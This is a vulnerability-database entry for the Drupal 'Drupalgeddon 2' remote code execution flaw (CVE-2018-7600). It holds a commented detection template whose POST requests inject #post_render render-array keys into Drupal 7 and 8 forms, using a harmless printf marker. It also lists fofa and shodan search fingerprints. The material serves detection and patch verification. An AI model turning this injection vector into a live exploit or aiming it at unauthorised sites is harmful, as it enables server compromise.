CVE-2018-7600: Drupal Drupalgeddon 2 RCE

日期: 2025-09-01 | 影响软件: 未知 | POC: 已公开

漏洞描述

Drupal Drupalgeddon 2 RCE(远程代码执行)。fofa: app="Drupal";shodan: http.html:"Drupal"

PoC代码[已公开]

# Detection template for CVE-2018-7600 (Drupal "Drupalgeddon 2" RCE).
# This block is metadata only; the probing logic lives under set/rules.
id: CVE-2018-7600

info:
  name: Drupal Drupalgeddon 2 RCE
  # NOTE(review): "unkown" looks like a misspelling of "unknown".
  author: unkown
  # NOTE(review): recorded as "high"; confirm against the vendor / NVD
  # rating for this CVE so that findings are triaged at the right level.
  severity: high
  # Free-text description. The fofa/shodan lines are product fingerprints
  # kept as text only; the rules in this file do not reference them.
  description: |-
    Drupal Drupalgeddon 2 RCE
    fofa: app="Drupal"
    shodan: http.html:"Drupal"
  # NOTE(review): confirm this URL resolves to the vendor advisory for this
  # CVE; that advisory is where the fixed releases are listed.
  reference:
    - https://www.drupal.org/node/2891024
  tags: cve,cve2018,drupal,rce
  created: 2023/08/10

# Two random marker strings produced by randomLowercase(4)
# (presumably four lowercase letters each; confirm against the engine docs).
# The requests send them as "{{r1}}%%{{r2}}" (URL-encoded as %25%25) and the
# response checks look for r1 + "%" + r2, i.e. with a single percent sign.
set:
  r1: randomLowercase(4)
  r2: randomLowercase(4)
# Three probe rules. Each one only asks the target to printf() a random
# marker; no file is written and no shell command is run by this template.
#
# Why the marker works as evidence: the request carries "r1%%r2" but the
# match is on "r1%r2". printf collapses "%%" to "%", so the match only
# succeeds when the value was processed as a printf format string; a page
# that merely echoes the request back ("r1%%r2" or "r1%25%25r2") does not
# contain "r1%r2" and will not match.
#
# Defender note: form parameter names containing "#post_render" (or the
# encoded "%23post_render"), and "element_parents" values ending in
# "#value", are the signature these requests leave in web / WAF logs.
# A positive result means the core update from the vendor advisory is missing.
rules:
  # Step 1 of the "?q=" style probe (rule name suggests Drupal 7.x).
  # Submits the password-reset form (form_id=user_pass) with render-array
  # keys injected through the "name" query parameter.
  drupal70:
    request:
      method: POST
      path: /?q=user/password&name[%23post_render][]=printf&name[%23type]=markup&name[%23markup]={{r1}}%25%25{{r2}}
      headers:
        Content-Type: application/x-www-form-urlencoded
      body: |
        form_id=user_pass&_triggering_element_name=name&_triggering_element_value=&opz=E-mail+new+Password
    # Only checks that the form came back with HTTP 200; the marker is not
    # looked for here, so this rule alone is not evidence of the flaw.
    expression: response.status == 200
    # Pulls the form_build_id value out of the returned HTML (named group
    # "build_id") and exposes it as {{build_id}} for the drupal71 rule.
    # NOTE(review): if the regex finds nothing, build_id is presumably
    # empty and drupal71 will simply fail to match; confirm engine behaviour.
    output:
      search: '"name=\"form_build_id\"\\s+value=\"(?P<build_id>.+?)\"".bsubmatch(response.body)'
      build_id: search["build_id"]
  # Step 2: replays the captured form_build_id against the file/ajax
  # endpoint (path is URL-encoded "file/ajax/name/#value/<build_id>").
  drupal71:
    request:
      method: POST
      path: /?q=file%2Fajax%2Fname%2F%23value%2F{{build_id}}
      headers:
        Content-Type: application/x-www-form-urlencoded
      body: |
        form_build_id={{build_id}}
    # Match only when the printf-processed marker (single "%") is present.
    expression: response.body.bcontains(bytes(r1 + "%" + r2))
  # Single-request probe against the registration form's AJAX handler
  # (rule name suggests Drupal 8.x). Render-array keys are injected through
  # the "mail" field; "#" is sent raw here because it is in the POST body.
  # NOTE(review): no status check on this rule; the marker match is the
  # only condition.
  drupal80:
    request:
      method: POST
      path: /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax
      headers:
        Content-Type: application/x-www-form-urlencoded
      body: |
        form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=printf&mail[#type]=markup&mail[#markup]={{r1}}%25%25{{r2}}
    expression: response.body.bcontains(bytes(r1 + "%" + r2))
# Overall verdict for the template.
# NOTE(review): assuming the usual precedence (&& binds tighter than ||),
# this reads as drupal80() || (drupal70() && drupal71()): either the
# single-request probe matches, or both steps of the two-request probe do.
# drupal70 only checks for HTTP 200, so it must never count on its own.
expression: drupal80() || drupal70() && drupal71()